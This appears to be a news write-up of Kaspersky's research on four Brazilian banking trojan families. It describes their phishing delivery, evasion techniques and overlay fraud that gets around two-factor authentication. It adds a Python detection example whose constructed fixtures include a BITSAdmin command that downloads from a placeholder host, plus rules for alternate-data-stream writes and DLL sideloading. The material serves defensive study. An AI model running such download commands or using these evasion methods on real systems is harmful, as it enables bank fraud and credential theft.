Recent investigations by cybersecurity experts have unveiled the presence of four distinct Brazilian banking trojan families that have launched sophisticated attacks against financial institutions in Brazil, other parts of Latin America, and Europe. Collectively identified as “Tetrade” by researchers at Kaspersky, these malware families—Guildma, Javali, Melcoz, and Grandoreiro—have significantly enhanced their operational capabilities, incorporating backdoor functions and advanced obfuscation techniques designed to elude detection by security software.

Kaspersky emphasized that this new wave of malicious activity is part of a broader strategy by Brazilian cybercriminals to expand their operations internationally, capitalizing on the fact that many banks within Brazil maintain a presence in other regions, making it easier to target customers beyond national borders. Their analysis noted that these malware families could readily extend their reach to impact customers of financial institutions operating globally.

The deployment of these trojans often follows a multi-stage process, predominantly utilizing phishing emails to deliver the initial payload. Specifically, Guildma and Javali have adapted their tactics since their initial emergence, with Guildma notably expanding its operational scope to encompass users in various Latin American countries. Recent iterations of Guildma leverage compressed email attachments and HTML files that execute JavaScript to discreetly download additional malicious components via legitimate Windows tools like BITSAdmin.

Moreover, the malware uses NTFS Alternate Data Streams to hide its files on infected systems. DLL Search Order Hijacking is used to execute the malware binaries, and execution only proceeds if the environment shows no indicators of debugging or virtualization, which are typical of the sandboxes and analysis tools security teams use to identify malware. Notably, process hollowing is employed to conceal malicious payloads within legitimate processes, further complicating detection.
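As an added illustration that is not part of the Kaspersky report or this article, the following Python hunt rules flag the three delivery-chain behaviours described above (a BITSAdmin download spawned by a script host, a write to an NTFS alternate data stream, and a hijack-prone DLL loaded unsigned from a user-writable path) over constructed Sysmon-style events; the event schema, the script-host list and the DLL names are assumptions made for the example.

```python
import ntpath
import re

# Constructed Sysmon-style events (not real telemetry): three malicious behaviours
# followed by benign look-alikes that the rules must not flag.
EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"bitsadmin /transfer j /download http://example.invalid/a.zip C:\Users\Public\a.zip"},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\Public\readme.txt:stage2.dll"},
    {"type": "image_load", "image": r"C:\Users\Public\vendor\app.exe",
     "loaded": r"C:\Users\Public\vendor\version.dll", "signed": False},
    {"type": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "bitsadmin /list"},
    {"type": "file_create", "image": r"C:\Program Files\Browser\browser.exe",
     "target": r"C:\Users\Public\a.zip:Zone.Identifier"},
    {"type": "image_load", "image": r"C:\Windows\explorer.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": True},
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
HIJACK_PRONE_DLLS = {"version.dll", "dwmapi.dll", "cryptbase.dll"}  # assumed list, not from the report
ADS_RE = re.compile(r"^[A-Za-z]:\\[^:]+:[^\\]+$")  # a second colon after the drive letter marks an ADS

def bitsadmin_download_from_script_host(ev):
    """BITSAdmin /transfer launched by a script host, as in the HTML/JS lure chain."""
    return (ev["type"] == "process_create"
            and ntpath.basename(ev["image"]).lower() == "bitsadmin.exe"
            and "/transfer" in ev["cmd"].lower()
            and ntpath.basename(ev["parent"]).lower() in SCRIPT_HOSTS)

def ads_write(ev):
    """File written to an alternate data stream; the Zone.Identifier (mark-of-the-web) stream is benign."""
    return (ev["type"] == "file_create"
            and ADS_RE.match(ev["target"]) is not None
            and ":zone.identifier" not in ev["target"].lower())

def dll_sideload(ev):
    """Hijack-prone DLL name loaded unsigned from outside the Windows directory."""
    return (ev["type"] == "image_load"
            and ntpath.basename(ev["loaded"]).lower() in HIJACK_PRONE_DLLS
            and not ev["loaded"].lower().startswith("c:\\windows\\")
            and not ev["signed"])

RULES = (bitsadmin_download_from_script_host, ads_write, dll_sideload)

def hunt(events):
    """Return (rule_name, event_index) for every event that trips a rule."""
    return [(rule.__name__, i) for i, ev in enumerate(events) for rule in RULES if rule(ev)]
```

Running `hunt(EVENTS)` flags only the first three events; the benign BITSAdmin listing, the mark-of-the-web stream and the signed System32 DLL pass untouched.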

Once fully operational, the final payload is programmed to monitor specific banking websites. As soon as victims access these sites, a sequence of operations is initiated, enabling cybercriminals to exploit the victim’s machine for fraudulent financial transactions. Javali, which has been in circulation since November 2017, also retrieves payloads through emails but ultimately downloads malware capable of stealing credentials and sensitive information from users engaging with cryptocurrency platforms or payment systems.

Melcoz, a variant derived from an open-source remote access tool, has been tied to multiple attacks across Chile and Mexico. This malware can extract passwords, manipulate clipboard data, and even alter Bitcoin wallet addresses so that funds go directly to the attackers. Melcoz is installed via VBS scripts and abuses the AutoIt interpreter and the VMware NAT service to run its malicious code.

Kaspersky’s research highlighted the malware’s ability to display overlay windows during online banking sessions, effectively hijacking the user’s activity without being noticed. This technique lets attackers carry out fraudulent transactions directly from the compromised system, which makes it harder for the anti-fraud systems employed by banks to identify suspicious activity. Through these overlays, attackers can also solicit transaction-specific details, such as one-time passwords, and so circumvent two-factor authentication.

The Grandoreiro malware, active since 2016, has been associated with campaigns targeting Brazil, Mexico, Portugal, and Spain. It facilitates fraudulent banking actions by operating from the victims’ computers to bypass conventional banking security measures. The malware has been hosted on Google Sites and distributed through compromised websites and spear-phishing, and it uses Domain Generation Algorithms (DGA) to obscure its command-and-control infrastructure during attacks.

Kaspersky concluded that Brazilian cybercriminals are developing a collaborative ecosystem of affiliates, recruiting international partners while embracing malware-as-a-service models. The innovations in these trojan families, such as the use of DGAs, encrypted payloads, and various evasion techniques, suggest a resiliency and adaptability intended to evade detection and continue targeting a broader array of financial institutions across numerous countries.

Through the lens of the MITRE ATT&CK framework, tactics such as initial access, persistence, privilege escalation, and others are integral to understanding the operational methods of these adversaries. The evolving landscape of these banking trojans indicates a significant and ongoing threat to both organizations and individuals within the financial sector.
